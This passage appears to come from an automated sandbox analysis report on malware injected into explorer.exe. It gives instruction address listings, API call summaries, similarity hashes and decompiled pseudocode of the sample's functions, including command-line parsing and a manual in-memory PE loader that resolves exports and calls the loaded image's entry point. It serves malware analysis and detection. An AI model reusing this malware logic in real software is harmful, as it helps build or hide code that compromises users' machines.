                                                                                                            0x032ef8d6
                                                                                                            0x032ef8e4
                                                                                                            0x032ef8e7
                                                                                                            0x032ef8ed
                                                                                                            0x032ef8ee
                                                                                                            0x032ef8f0
                                                                                                            0x032ef8f9
                                                                                                            0x032ef8fa
                                                                                                            0x032ef8ff
                                                                                                            0x032ef905
                                                                                                            0x032ef90f
                                                                                                            0x032ef90f
                                                                                                            0x032ef911
                                                                                                            0x032ef916
                                                                                                            0x032ef920
                                                                                                            0x032ef92b
                                                                                                            0x032ef934
                                                                                                            0x032ef936
                                                                                                            0x032ef938
                                                                                                            0x032ef947
                                                                                                            0x032ef95e
                                                                                                            0x032ef964
                                                                                                            0x032ef967
                                                                                                            0x032ef96b
                                                                                                            0x032ef96d
                                                                                                            0x032ef972
                                                                                                            0x032ef972
                                                                                                            0x032ef977
                                                                                                            0x032ef979
                                                                                                            0x032ef98f
                                                                                                            0x032ef993
                                                                                                            0x032ef998
                                                                                                            0x032ef99a
                                                                                                            0x032ef99a
                                                                                                            0x032ef9ae
                                                                                                            0x032ef9b9
                                                                                                            0x032ef9bc
                                                                                                            0x032ef9bf
                                                                                                            0x032ef9c2
                                                                                                            0x032ef9c7
                                                                                                            0x032ef9cc
                                                                                                            0x032ef9cc
                                                                                                            0x032ef9cf
                                                                                                            0x032ef9d1
                                                                                                            0x032ef9f7
                                                                                                            0x032ef9fb
                                                                                                            0x032ef9ff
                                                                                                            0x032ef9ff
                                                                                                            0x032efa09
                                                                                                            0x032efa11
                                                                                                            0x032efa16
                                                                                                            0x032efa21
                                                                                                            0x032efa27
                                                                                                            0x032efa31
                                                                                                            0x032efa34
                                                                                                            0x032efa39
                                                                                                            0x032efa3d
                                                                                                            0x032efa42
                                                                                                            0x032efa42
                                                                                                            0x032efa47
                                                                                                            0x032efa4b
                                                                                                            0x032efa96
                                                                                                            0x032efa98
                                                                                                            0x032efa9b
                                                                                                            0x032efaa3
                                                                                                            0x032efaa7
                                                                                                            0x032efaaa
                                                                                                            0x032efabc
                                                                                                            0x032efac7
                                                                                                            0x032efac9
                                                                                                            0x032efadd
                                                                                                            0x032efae2
                                                                                                            0x032efae7
                                                                                                            0x032efb1c
                                                                                                            0x032efb21
                                                                                                            0x032efb26
                                                                                                            0x032efb28
                                                                                                            0x00000000
                                                                                                            0x032efb28
                                                                                                            0x032efaeb
                                                                                                            0x032efaee
                                                                                                            0x032efaee
                                                                                                            0x032efaf4
                                                                                                            0x032efaf7
                                                                                                            0x032efafa
                                                                                                            0x032efafa
                                                                                                            0x032efafc
                                                                                                            0x032efafe
                                                                                                            0x032efb04
                                                                                                            0x032efb04
                                                                                                            0x032efb07
                                                                                                            0x032efb09
                                                                                                            0x032efb0b
                                                                                                            0x032efb12
                                                                                                            0x032efb12
                                                                                                            0x00000000
                                                                                                            0x032efb15
                                                                                                            0x032efacb
                                                                                                            0x032efad1
                                                                                                            0x00000000
                                                                                                            0x032efa4d
                                                                                                            0x032efa4d
                                                                                                            0x032efa53
                                                                                                            0x032efa59
                                                                                                            0x032efa5c
                                                                                                            0x032efa61
                                                                                                            0x032efa66
                                                                                                            0x032efa69
                                                                                                            0x032efa6e
                                                                                                            0x032efa6e
                                                                                                            0x032efa71
                                                                                                            0x032efa74
                                                                                                            0x00000000
                                                                                                            0x032efa74
                                                                                                            0x032ef9d3
                                                                                                            0x032ef9d3
                                                                                                            0x032ef9d9
                                                                                                            0x032ef9df
                                                                                                            0x032ef9e2
                                                                                                            0x032ef9e7
                                                                                                            0x032ef9ea
                                                                                                            0x032ef9ed
                                                                                                            0x032ef9ef
                                                                                                            0x00000000
                                                                                                            0x032ef9ef
                                                                                                            0x032ef97b
                                                                                                            0x032ef97b
                                                                                                            0x032ef981
                                                                                                            0x032ef987
                                                                                                            0x032efa77
                                                                                                            0x032efa77
                                                                                                            0x032efa77
                                                                                                            0x00000000
                                                                                                            0x032efa77
                                                                                                            0x032ef979
                                                                                                            0x032ef93a
                                                                                                            0x032efa79
                                                                                                            0x032efa7c
                                                                                                            0x032efa7e
                                                                                                            0x032efa81
                                                                                                            0x032efa84
                                                                                                            0x032efa84
                                                                                                            0x032efa8d
                                                                                                            0x032efa8f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032efa93
                                                                                                            0x00000000
                                                                                                            0x032efa93
                                                                                                            0x032ef909
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 032EF854
                                                                                                            • memset.MSVCRT ref: 032EF865
                                                                                                              • Part of subcall function 032E8F0A: memset.MSVCRT ref: 032E8F1C
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 032EF93A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: memset$ErrorLast
                                                                                                            • String ID: POST
                                                                                                            • API String ID: 2570506013-1814004025
                                                                                                            • Opcode ID: 39cb92e27b3b6e85f0d29fb984fcdb8ca882c0eeb17c03ac34d8d3b2beb2d548
                                                                                                            • Instruction ID: e71412aac152e1cf2fca2af8d37e1bfca0a8827cc544e60dcfb1288f9c1364e0
                                                                                                            • Opcode Fuzzy Hash: 39cb92e27b3b6e85f0d29fb984fcdb8ca882c0eeb17c03ac34d8d3b2beb2d548
                                                                                                            • Instruction Fuzzy Hash: B5A19F75910219FFDB10EFA4D989AAEB7B8FF08710F55406AE905EB350DB749E80CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032F14E2 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _snprintfqsort
                                                                                                            • String ID: %I64d$false$null$true
                                                                                                            • API String ID: 756996078-4285102228
                                                                                                            • Opcode ID: 924df01534f4bf584308655940a4f696d5f420af53e34f2437cb539854fddfc8
                                                                                                            • Instruction ID: 60ab543770522ce2a9f5bb9d86a1494eb0071a451e7b193661610df43cb51203
                                                                                                            • Opcode Fuzzy Hash: 924df01534f4bf584308655940a4f696d5f420af53e34f2437cb539854fddfc8
                                                                                                            • Instruction Fuzzy Hash: A6E17D7192020AEFEF15DEA4DD41EBFBB69EF45240F444078FE159A241E671E6F08BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032E4FE8 Relevance: 9.2, APIs: 6, Instructions: 247stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E032E4FE8(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12) {
				void _v532;
				char _v548;
				char _v580;
				char _v584;
				short _v588;
				WCHAR* _v592;
				WCHAR* _v596;
				intOrPtr _v600;
				char _v628;
				char _v632;
				void* __ebx;
				void* __esi;
				short _t47;
				WCHAR* _t54;
				WCHAR* _t55;
				intOrPtr _t56;
				signed int _t61;
				void* _t65;
				void* _t66;
				WCHAR* _t67;
				intOrPtr _t68;
				WCHAR* _t70;
				intOrPtr _t71;
				WCHAR* _t73;
				WCHAR* _t83;
				intOrPtr _t84;
				void* _t85;
				intOrPtr _t86;
				void* _t93;
				intOrPtr _t94;
				intOrPtr _t96;
				void* _t99;
				void* _t100;
				WCHAR* _t101;
				void* _t112;
				WCHAR* _t116;
				intOrPtr _t127;
				void* _t128;
				void* _t146;
				WCHAR* _t149;
				void* _t150;
				void* _t152;
				void* _t156;
				WCHAR* _t157;
				WCHAR* _t159;
				signed int _t160;
				signed int _t161;
				intOrPtr* _t163;
				signed int _t165;
				void* _t168;
				void* _t169;
				intOrPtr* _t170;
				void* _t175;

				_t175 = __fp0;
				_push(_t160);
				_t99 = __edx;
				_t156 = __ecx;
				_t161 = _t160 | 0xffffffff;
				memset( &_v532, 0, 0x20c);
				_t168 = (_t165 & 0xfffffff8) - 0x254 + 0xc;
				_v592 = 1;
				if(_t156 != 0) {
					_t94 =  *0x32ff8e4; // 0x3310000
					_t96 =  *0x32ff8e8; // 0x52ef8b8
					_v600 =  *((intOrPtr*)(_t96 + 0x68))(_t156,  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0x110)))));
				}
				if(E032ECB96(_t156) != 0) {
					L4:
					_t47 = E032EC86B();
					_push(_t99);
					_v588 = _t47;
					E032EC65E(_t47,  &_v580, _t173, _t175);
					_t100 = E032E4FA4( &_v580,  &_v580, _t173);
					_t112 = E032EE3C8( &_v580, E032EA5DA( &_v580), 0);
					E032EC881(_t112,  &_v548, _t175);
					_push(_t112);
					_t54 = E032E311B(_t156,  &_v580, _t173, _t175);
					_v596 = _t54;
					if(_t54 != 0) {
						_push(0);
						_push(_t100);
						_push(0x32fc9d8);
						_t55 = E032E9BF7(_t54);
						_t169 = _t168 + 0x10;
						_t101 = _t55;
						__eflags = _v592;
						if(__eflags != 0) {
							_t56 = E032E9A5A(_v596);
							_t116 = _t101;
							 *0x32ff9a0 = _t56;
							 *0x32ff998 = E032E9A5A(_t116);
							L12:
							_push(_t116);
							_t157 = E032EA7D0( &_v532, _t156, _t175, _v588,  &_v584,  &_v596);
							_t170 = _t169 + 0x10;
							__eflags = _t157;
							if(_t157 == 0) {
								goto L36;
							}
							_push(0x32fca26);
							_t146 = 0xe;
							E032EAC40(_t146, _t175);
							E032EAC79(_t157, _t175, _t101);
							_t163 = _a4;
							_push( *_t163);
							E032EAC1B(0xb);
							_t148 =  *(_t163 + 0x10);
							__eflags =  *(_t163 + 0x10);
							if( *(_t163 + 0x10) != 0) {
								E032EB1C2(_t148, _t175);
							}
							_t149 =  *(_t163 + 0xc);
							__eflags = _t149;
							if(_t149 != 0) {
								E032EB1C2(_t149, _t175);
							}
							_t65 = E032EA202(0);
							_push(_t149);
							_t150 = 2;
							_t66 = E032EABED();
							__eflags = _v592;
							_t127 = _t65;
							if(_v592 == 0) {
								_t127 =  *0x32ff8e4; // 0x3310000
								__eflags =  *((intOrPtr*)(_t127 + 0xa4)) - 1;
								if(__eflags != 0) {
									_t67 = E032F0DFC(_t66, _t101, _t150, _t175, 0, _t101, 0);
									_t170 = _t170 + 0xc;
									goto L21;
								}
								_t127 = _t127 + 0x228;
								goto L20;
							} else {
								_t68 =  *0x32ff8e4; // 0x3310000
								__eflags =  *((intOrPtr*)(_t68 + 0xa4)) - 1;
								if(__eflags != 0) {
									L27:
									__eflags =  *(_t68 + 0x1898) & 0x00000082;
									if(( *(_t68 + 0x1898) & 0x00000082) != 0) {
										_t152 = 0x64;
										E032EF1DB(_t152);
									}
									E032E5603( &_v580, _t175);
									_t159 = _a8;
									_t128 = _t127;
									__eflags = _t159;
									if(_t159 != 0) {
										_t71 =  *0x32ff8e4; // 0x3310000
										__eflags =  *((intOrPtr*)(_t71 + 0xa0)) - 1;
										if( *((intOrPtr*)(_t71 + 0xa0)) != 1) {
											lstrcpyW(_t159, _t101);
										} else {
											_t73 = E032E109A(_t128, 0x1c7);
											_v596 = _t73;
											lstrcpyW(_t159, _t73);
											E032E8D41( &_v596);
											 *_t170 = "\"";
											lstrcatW(_t159, ??);
											lstrcatW(_t159, _t101);
											lstrcatW(_t159, "\"");
										}
									}
									_t70 = _a12;
									__eflags = _t70;
									if(_t70 != 0) {
										 *_t70 = _v588;
									}
									_t161 = 0;
									__eflags = 0;
									goto L36;
								}
								_t32 = _t68 + 0x228; // 0x3310228
								_t127 = _t32;
								L20:
								_t67 = E032E5878(_t127, _t101, __eflags);
								L21:
								__eflags = _t67;
								if(_t67 >= 0) {
									_t68 =  *0x32ff8e4; // 0x3310000
									goto L27;
								}
								_push(0xfffffffd);
								L6:
								_pop(_t161);
								goto L36;
							}
						}
						_t83 = E032ED224(_v588, __eflags);
						_v596 = _t83;
						_t84 =  *0x32ff8e0; // 0x52ef6c8
						_t85 =  *((intOrPtr*)(_t84 + 0xdc))(_t83, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
						__eflags = _t85 - _t161;
						if(_t85 != _t161) {
							_t86 =  *0x32ff8e0; // 0x52ef6c8
							 *((intOrPtr*)(_t86 + 0x30))();
							E032E8D86( &_v632, _t161);
							_t116 = _t85;
							goto L12;
						}
						E032E8D86( &_v628, _t161);
						_t61 = 1;
						goto L37;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t93 = E032E3034( &_v532, _t161, 0x105);
					_t173 = _t93;
					if(_t93 == 0) {
						L36:
						_t61 = _t161;
						L37:
						return _t61;
					}
					goto L4;
				}
			}
























































                                                                                                            0x032e4fe8
                                                                                                            0x032e4ff5
                                                                                                            0x032e5000
                                                                                                            0x032e5005
                                                                                                            0x032e5007
                                                                                                            0x032e500a
                                                                                                            0x032e500f
                                                                                                            0x032e5012
                                                                                                            0x032e501c
                                                                                                            0x032e501e
                                                                                                            0x032e502b
                                                                                                            0x032e5034
                                                                                                            0x032e5034
                                                                                                            0x032e5041
                                                                                                            0x032e505c
                                                                                                            0x032e505e
                                                                                                            0x032e5063
                                                                                                            0x032e5068
                                                                                                            0x032e506e
                                                                                                            0x032e507d
                                                                                                            0x032e509c
                                                                                                            0x032e509e
                                                                                                            0x032e50a3
                                                                                                            0x032e50aa
                                                                                                            0x032e50af
                                                                                                            0x032e50b6
                                                                                                            0x032e50c0
                                                                                                            0x032e50c2
                                                                                                            0x032e50c3
                                                                                                            0x032e50c9
                                                                                                            0x032e50ce
                                                                                                            0x032e50d1
                                                                                                            0x032e50d3
                                                                                                            0x032e50d8
                                                                                                            0x032e513f
                                                                                                            0x032e5144
                                                                                                            0x032e5146
                                                                                                            0x032e5150
                                                                                                            0x032e5155
                                                                                                            0x032e5155
                                                                                                            0x032e516f
                                                                                                            0x032e5171
                                                                                                            0x032e5174
                                                                                                            0x032e5176
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032e517c
                                                                                                            0x032e5183
                                                                                                            0x032e5186
                                                                                                            0x032e518f
                                                                                                            0x032e5194
                                                                                                            0x032e519a
                                                                                                            0x032e519f
                                                                                                            0x032e51a4
                                                                                                            0x032e51a8
                                                                                                            0x032e51aa
                                                                                                            0x032e51ae
                                                                                                            0x032e51ae
                                                                                                            0x032e51b3
                                                                                                            0x032e51b6
                                                                                                            0x032e51b8
                                                                                                            0x032e51bc
                                                                                                            0x032e51bc
                                                                                                            0x032e51c3
                                                                                                            0x032e51c8
                                                                                                            0x032e51cc
                                                                                                            0x032e51cf
                                                                                                            0x032e51d4
                                                                                                            0x032e51da
                                                                                                            0x032e51db
                                                                                                            0x032e5203
                                                                                                            0x032e5209
                                                                                                            0x032e5210
                                                                                                            0x032e521f
                                                                                                            0x032e5224
                                                                                                            0x00000000
                                                                                                            0x032e5224
                                                                                                            0x032e5212
                                                                                                            0x00000000
                                                                                                            0x032e51dd
                                                                                                            0x032e51dd
                                                                                                            0x032e51e2
                                                                                                            0x032e51e9
                                                                                                            0x032e522e
                                                                                                            0x032e522e
                                                                                                            0x032e5235
                                                                                                            0x032e5239
                                                                                                            0x032e523a
                                                                                                            0x032e523a
                                                                                                            0x032e5244
                                                                                                            0x032e5249
                                                                                                            0x032e524c
                                                                                                            0x032e524d
                                                                                                            0x032e524f
                                                                                                            0x032e5251
                                                                                                            0x032e5256
                                                                                                            0x032e525d
                                                                                                            0x032e52a0
                                                                                                            0x032e525f
                                                                                                            0x032e5264
                                                                                                            0x032e526c
                                                                                                            0x032e5270
                                                                                                            0x032e527b
                                                                                                            0x032e5286
                                                                                                            0x032e528e
                                                                                                            0x032e5292
                                                                                                            0x032e529a
                                                                                                            0x032e529a
                                                                                                            0x032e525d
                                                                                                            0x032e52a6
                                                                                                            0x032e52a9
                                                                                                            0x032e52ab
                                                                                                            0x032e52b1
                                                                                                            0x032e52b1
                                                                                                            0x032e52b3
                                                                                                            0x032e52b3
                                                                                                            0x00000000
                                                                                                            0x032e52b3
                                                                                                            0x032e51eb
                                                                                                            0x032e51eb
                                                                                                            0x032e51f1
                                                                                                            0x032e51f3
                                                                                                            0x032e51f8
                                                                                                            0x032e51f8
                                                                                                            0x032e51fa
                                                                                                            0x032e5229
                                                                                                            0x00000000
                                                                                                            0x032e5229
                                                                                                            0x032e51fc
                                                                                                            0x032e50ba
                                                                                                            0x032e50ba
                                                                                                            0x00000000
                                                                                                            0x032e50ba
                                                                                                            0x032e51db
                                                                                                            0x032e50de
                                                                                                            0x032e50ec
                                                                                                            0x032e50ff
                                                                                                            0x032e5104
                                                                                                            0x032e510a
                                                                                                            0x032e510c
                                                                                                            0x032e5124
                                                                                                            0x032e5129
                                                                                                            0x032e5132
                                                                                                            0x032e5138
                                                                                                            0x00000000
                                                                                                            0x032e5138
                                                                                                            0x032e5114
                                                                                                            0x032e511d
                                                                                                            0x00000000
                                                                                                            0x032e511d
                                                                                                            0x032e50b8
                                                                                                            0x00000000
                                                                                                            0x032e5043
                                                                                                            0x032e504e
                                                                                                            0x032e5054
                                                                                                            0x032e5056
                                                                                                            0x032e52b5
                                                                                                            0x032e52b5
                                                                                                            0x032e52b7
                                                                                                            0x032e52bd
                                                                                                            0x032e52bd
                                                                                                            0x00000000
                                                                                                            0x032e5056

                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 032E500A
                                                                                                            • lstrcpyW.KERNEL32 ref: 032E5270
                                                                                                            • lstrcatW.KERNEL32(00000000,?), ref: 032E528E
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 032E5292
                                                                                                            • lstrcatW.KERNEL32(00000000,032FCA28), ref: 032E529A
                                                                                                              • Part of subcall function 032E8D86: RtlFreeHeap.NTDLL(00000000,00000000), ref: 032E8DCC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$FreeHeaplstrcpymemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 911671052-0
                                                                                                            • Opcode ID: d8cc735e65893f1d515deebff2e034098250bc0585287bd3a7978c64e21791e4
                                                                                                            • Instruction ID: 10e12367ee0f205de1284dd353e80af6ff734174ea570d1f81b93cabba6c984f
                                                                                                            • Opcode Fuzzy Hash: d8cc735e65893f1d515deebff2e034098250bc0585287bd3a7978c64e21791e4
                                                                                                            • Instruction Fuzzy Hash: A9710439734301AFD714EB60E946B7E73E9EF85624F64452EF5059F280EBB0D8848A91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032EDF29 Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E032EDF29(WCHAR* __ecx) {
				int _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v140;
				WCHAR* _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				WCHAR* _t36;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t49;
				signed int _t51;
				WCHAR* _t52;
				void* _t53;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t51 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 =  *(_t28 + _t41 * 4);
					_t30 =  *_t49 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
						_t40 = lstrlenW(_t49);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t51 = _t51 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t49[_t45] == 0x2c) {
								_t49[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t51 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t52 = _v140;
					L17:
					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
						lstrcpynW(_v16, _t52, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t52);
						_push(0x32fc9d8);
						_t36 = E032E9BF7( &_v664);
						_v12 = _t36;
						lstrcpynW(_v16, _t36, 0x104);
						E032E8D86( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t52 = _v144;
				goto L17;
			}





















                                                                                                            0x032edf32
                                                                                                            0x032edf39
                                                                                                            0x032edf3c
                                                                                                            0x032edf49
                                                                                                            0x032edf4f
                                                                                                            0x032edf52
                                                                                                            0x032edf54
                                                                                                            0x032edf59
                                                                                                            0x032ee031
                                                                                                            0x032ee031
                                                                                                            0x032ee031
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032edf5f
                                                                                                            0x032edf5f
                                                                                                            0x032edf5f
                                                                                                            0x032edf62
                                                                                                            0x032edf68
                                                                                                            0x032edf84
                                                                                                            0x032edf8b
                                                                                                            0x032edf91
                                                                                                            0x032edf95
                                                                                                            0x032edfa9
                                                                                                            0x032edfa9
                                                                                                            0x032edfac
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032edf97
                                                                                                            0x032edf97
                                                                                                            0x032edf9c
                                                                                                            0x032edfa0
                                                                                                            0x032edfa0
                                                                                                            0x032edfa4
                                                                                                            0x032edfa5
                                                                                                            0x00000000
                                                                                                            0x032edf97
                                                                                                            0x032edfad
                                                                                                            0x032edfad
                                                                                                            0x032edfb0
                                                                                                            0x032edfb1
                                                                                                            0x032edfb8
                                                                                                            0x032edfc2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032edfc4
                                                                                                            0x032edfca
                                                                                                            0x032edfce
                                                                                                            0x032ee027
                                                                                                            0x032edfd7
                                                                                                            0x032edfe4
                                                                                                            0x032edfea
                                                                                                            0x032edfec
                                                                                                            0x032edff3
                                                                                                            0x032edff9
                                                                                                            0x032ee001
                                                                                                            0x032ee009
                                                                                                            0x032ee015
                                                                                                            0x032ee01b
                                                                                                            0x00000000
                                                                                                            0x032ee02d
                                                                                                            0x032edfba
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetCommandLineW.KERNEL32 ref: 032EDF3E
                                                                                                            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 032EDF49
                                                                                                            • lstrlenW.KERNEL32 ref: 032EDF8B
                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 032EDFE4
                                                                                                            • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 032EE009
                                                                                                            • lstrcpynW.KERNEL32(?,?,00000104), ref: 032EE027
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1259063344-0
                                                                                                            • Opcode ID: 477a2b1a2737c4c470c15922dccabef4ad21ec622f331272725277193d7a01ba
                                                                                                            • Instruction ID: a799a0aa2da1e6bdcb0f4acb0072aca261d765a4b14e4da8c7bea2f13957b6a1
                                                                                                            • Opcode Fuzzy Hash: 477a2b1a2737c4c470c15922dccabef4ad21ec622f331272725277193d7a01ba
                                                                                                            • Instruction Fuzzy Hash: E2310771D20116AFCF24EB94DC9AFADB7B8EF04721F9445A9E405E61A0E77099C1CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032EE759 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 032EE76D
                                                                                                            • SysAllocString.OLEAUT32(?), ref: 032EE775
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 032EE789
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 032EE804
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 032EE807
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 032EE80C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 344208780-0
                                                                                                            • Opcode ID: f67fb72c8f5a7dcab01e0a054aded31cdde7d6f76652d7364f0dea24f6457072
                                                                                                            • Instruction ID: a9e9f33cbbc0fde5441a9b11a554cc399cec63df734f82204837473eecc278ec
                                                                                                            • Opcode Fuzzy Hash: f67fb72c8f5a7dcab01e0a054aded31cdde7d6f76652d7364f0dea24f6457072
                                                                                                            • Instruction Fuzzy Hash: 55212C75900219BFDB00DFA5CC88DAFBBBDEF48654B2044AAF505EB250D771AE41DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032F3DE4 Relevance: 7.8, APIs: 5, Instructions: 322libraryloaderstringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 20%
                                                                                                            			E032F3DE4(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t216;
				signed int _t233;
				void* _t273;
				signed int _t278;
				signed int _t280;
				intOrPtr _t320;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t320;
				if(_t320 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t216 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t233 = 8;
